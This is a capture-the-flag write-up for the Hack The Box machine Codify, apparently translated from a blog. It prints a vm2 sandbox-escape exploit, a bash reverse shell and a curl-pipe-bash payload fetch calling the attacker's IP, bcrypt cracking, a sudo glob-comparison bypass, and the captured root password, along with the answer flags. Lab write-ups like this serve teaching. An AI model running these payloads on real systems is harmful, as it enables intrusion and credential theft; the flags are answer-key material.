HTB: Codify [WriteUp]
Contents
1. Which is the highest open TCP port on Codify?
2. What is the relative path on the web application that offers a form to run JavaScript code?
3. What is the name of the sandboxing library used by the application?
4. What is the 2023 CVE ID assigned to a remote code execution vulnerability in vm2 that was patched in version 3.9.17?
5. What user is the web application running as?
6. There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application?
7. What is the joshua user's password on Codify?
8. Submit the flag located in the joshua user's home directory.
USER_FLAG: e91eb1d8b760341e1e4c5d21b8ad78c2
9. What is the full path of the script that the joshua user can run as root?
10. Which single character is accepted as the password, bypassing the password check in the script?
11. What is the root user's MySQL password?
12. Submit the flag located in the root user's home directory.
ROOT_FLAG: 7f32c11faceea579277b7f2e9dd98edf
Connect to the HTB VPN server and start the target machine.
Target IP: 10.10.11.239
Attacker (assigned) IP: 10.10.14.12
1.Which is the highest open TCP port on Codify?
Use nmap to scan all TCP ports on the target for open ports.
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.239
From the scan result, the highest open port on the target is: 3000
2.What is the relative path on the web application that offers a form to run JavaScript code?
Use nmap to run the default scripts and service-version detection against the open TCP ports.
nmap -p 22,80,3000 -sCV 10.10.11.239
Use curl to request port 80 on the target.
curl -I http://10.10.11.239:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.239:80
HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Nov 2024 02:30:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://codify.htb/
Content-Type: text/html; charset=iso-8859-1
The output shows that the request is redirected to codify.htb.
Add an entry to the hosts file so that the domain resolves locally.
echo '10.10.11.239 codify.htb' >> /etc/hosts
Visit port 80 on the target in a browser.
The page layout looks odd, so try port 3000 in a browser instead.
Clicking "Try it now" leads to a form where JS code can be entered and run: /editor
3.What is the name of the sandboxing library used by the application?
Open "About us" to read the information about this web application.
The About us page reads:
About Us
At Codify, our mission is to make it easier for developers to test their Node.js code. We understand that testing code can be time-consuming and difficult, which is why we built this platform to simplify the process.
Our team consists of experienced developers who are passionate about creating tools that make development easier. We are committed to providing a reliable and secure platform that you can trust to test your code.
Thank you for using Codify, and we hope our platform helps you build better Node.js applications.
About our code editor: our code editor is a powerful tool that allows developers to write and test Node.js code in a user-friendly environment. You can write and run JavaScript code directly in the browser, making it easy to experiment with and debug your applications.
The vm2 library is a widely used and trusted JavaScript sandboxing tool. It adds an extra layer of security to prevent potentially harmful code from damaging your system. We take the security and reliability of our platform very seriously, and we use vm2 to ensure your code has a safe testing environment.
From this description, the sandboxing library is: vm2
4.What is the 2023 CVE ID assigned to a remote code execution vulnerability in vm2 that was patched in version 3.9.17?
Use searchsploit to search for known vulnerabilities in this sandbox library.
searchsploit vm2
Copy the PoC into the current directory.
searchsploit -m 51898.c
View the file's code.
cat 51898.c
/*
# Exploit Title: vm2 Sandbox Escape vulnerability
# Date: 23/12/2023
# Exploit Author: Calil Khalil & Adriel Mc Roberts
# Vendor Homepage: https://github.com/patriksimek/vm2
# Software Link: https://github.com/patriksimek/vm2
# Version: vm2 <= 3.9.19
# Tested on: Ubuntu 22.04
# CVE : CVE-2023-37466
*/

const { VM } = require("vm2");
const vm = new VM();

const command = 'pwd'; // Change to the desired command

const code = `
async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
}

try {
    const handler = {
        getPrototypeOf(target) {
            (function stack() {
                new Error().stack;
                stack();
            })();
        }
    };

    const proxiedErr = new Proxy({}, handler);
    throw proxiedErr;
} catch ({ constructor: c }) {
    const childProcess = c.constructor('return process')().mainModule.require('child_process');
    childProcess.execSync('${command}');
}
`;

console.log(vm.run(code));
The comment in the code says this PoC is for CVE-2023-37466, but submitting that as the answer was rejected.
Searching Google directly and submitting a few candidates, the accepted answer finally turned out to be: CVE-2023-30547
5.What user is the web application running as?
So can the PoC we found with searchsploit actually be used? Let's try it.
Take the exploit part of the PoC and submit it directly through the form.
Create a reverse shell script locally.
echo 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1' > revr.sh
Start an HTTP server with Python.
python -m http.server 7777
Start an nc listener on the local side.
nc -lvnp 1425
Modify the code submitted in the target's sandbox form so that the command fetches the Bash script from the local side:
const command = 'curl 10.10.14.12:7777/revr.sh|bash';
The local nc listener receives a connection:
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.239] 49766
bash: cannot set terminal process group (1267): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$ whoami
whoami
svc
Running whoami shows that the current user is: svc
6.There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application?
In the /var/www/contact directory there is a db file: tickets.db
ls /var/www/contact
svc@codify:~$ ls /var/www/contact
ls /var/www/contact
index.js
package.json
package-lock.json
templates
tickets.db
7.What is the joshua user's password on Codify?
View the file's contents.
strings /var/www/contact/tickets.db
A username and password hash appear in the output:
joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
Use hashid to identify the hash type.
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' > hash
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashid < hash
Analyzing '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
Use man to consult the hashcat manual for the mode option corresponding to this hash type (bcrypt is mode 3200).
Use hashcat to crack the hash.
hashcat -m 3200 hash ../dictionary/rockyou.txt --quiet
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashcat -m 3200 hash ../dictionary/rockyou.txt --quiet
$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2:spongebob1
Account: joshua
Password: spongebob1
8.Submit the flag located in the joshua user's home directory.
Connect to the target's SSH service with the credentials above.
ssh joshua@10.10.11.239
Locate the user flag and view its contents.
joshua@codify:~$ find / -name 'user.txt' 2>/dev/null
/home/joshua/user.txt
joshua@codify:~$ cat /home/joshua/user.txt
e91eb1d8b760341e1e4c5d21b8ad78c2
USER_FLAG:e91eb1d8b760341e1e4c5d21b8ad78c2
9.What is the full path of the script that the joshua user can run as root?
Check which commands the current user may run with elevated privileges.
sudo -l
joshua@codify:~$ sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
The full path of the script that can be run as root is: /opt/scripts/mysql-backup.sh
10.Which single character is accepted as the password, bypassing the password check in the script?
View the file's contents.
cat /opt/scripts/mysql-backup.sh
#!/bin/bash

DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
    /usr/bin/echo "Password confirmed!"
else
    /usr/bin/echo "Password confirmation failed!"
    exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
Reviewing the script: DB_PASS is read from /root/.creds with cat and compared against the USER_PASS we type in using "==" inside [[ ]]. Because the right-hand side of that comparison is unquoted, bash treats USER_PASS as a glob pattern rather than a literal string.
So entering "*" as USER_PASS matches any DB_PASS, and the condition is always true.
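As an added illustration (not part of the original writeup or of the Codify box), the script below models the backup script's password check: weak_check reproduces the unquoted pattern comparison, safe_check is the literal comparison that the script should have used, and report runs both over a correct password, a wrong one and a bare "*". The SECRET value is a constructed placeholder, not the box's credential.

```shell
#!/bin/sh
# Added example, not taken from the writeup or the Codify box. It models the
# password check in /opt/scripts/mysql-backup.sh. In bash, the unquoted
# right-hand side of [[ $DB_PASS == $USER_PASS ]] is treated as a glob
# pattern; a POSIX `case` statement applies the same pattern semantics, so
# weak_check reproduces the flaw portably. SECRET is a constructed placeholder.
SECRET='example-db-secret-42'

# Weak check: same semantics as the script's unquoted [[ == ]] comparison.
# Returns 0 (accepted) when the candidate, read as a glob, matches SECRET.
weak_check() {
    case "$SECRET" in
        $1) return 0 ;;
        *)  return 1 ;;
    esac
}

# Hardened check: a literal string comparison. In bash this is the same as
# quoting the right-hand side: [[ "$DB_PASS" == "$USER_PASS" ]].
safe_check() {
    [ "$SECRET" = "$1" ]
}

# Runs both checks over a correct password, a wrong one and the bare '*'.
# Only '*' differs: accepted by weak_check, rejected by safe_check.
report() {
    for c in "$SECRET" 'wrong-password' '*'; do
        if weak_check "$c"; then w=accepted; else w=rejected; fi
        if safe_check "$c"; then s=accepted; else s=rejected; fi
        printf '%-22s weak=%-9s safe=%s\n' "$c" "$w" "$s"
    done
}

report
```

The same fix applies to the real script: quote "$USER_PASS" on the right-hand side, or use a plain [ "$DB_PASS" = "$USER_PASS" ] test.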
11.What is the root user's MySQL password?
Use the pspy tool to monitor process activity on the target and capture the database password.
Start an HTTP server with Python on the attacking machine, then download the file on the target with wget.
joshua@codify:~$ wget http://10.10.14.12:7777/pspy64s -O pspy64s
--2024-11-06 10:50:48-- http://10.10.14.12:7777/pspy64s
Connecting to 10.10.14.12:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1233888 (1.2M) [application/octet-stream]
Saving to: ‘pspy64s’

pspy64s 100%[======================================================================================================================>] 1.18M 2.57MB/s in 0.5s
2024-11-06 10:50:49 (2.57 MB/s) - ‘pspy64s’ saved [1233888/1233888]
joshua@codify:~$ ls
pspy64s user.txt
Give the pspy64s file execute permission.
chmod +x pspy64s
Run it to continuously monitor processes on the target.
./pspy64s -i 1000
Open a second SSH session to the target.
ssh joshua@10.10.11.239
Run mysql-backup.sh with sudo.
sudo /opt/scripts/mysql-backup.sh
At the prompt "Enter MySQL password for root:", enter an asterisk (*).
joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root:
Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!
In the other SSH session, the database login password appears in pspy's output, because the script passes it on the mysql command line with -p"$DB_PASS", where any user who can list processes can read it:
kljh12k3jhaskjh12kjh3
12.Submit the flag located in the root user's home directory.
Use this password directly to switch to the root user on the target.
su -
joshua@codify:~$ su -
Password:
root@codify:~# whoami
root
Locate the root flag and view its contents.
root@codify:~# find / -name 'root.txt'
/root/root.txt
root@codify:~# cat /root/root.txt
7f32c11faceea579277b7f2e9dd98edf
ROOT_FLAG:7f32c11faceea579277b7f2e9dd98edf
Original article: https://blog.csdn.net/qq_43007452/article/details/143563016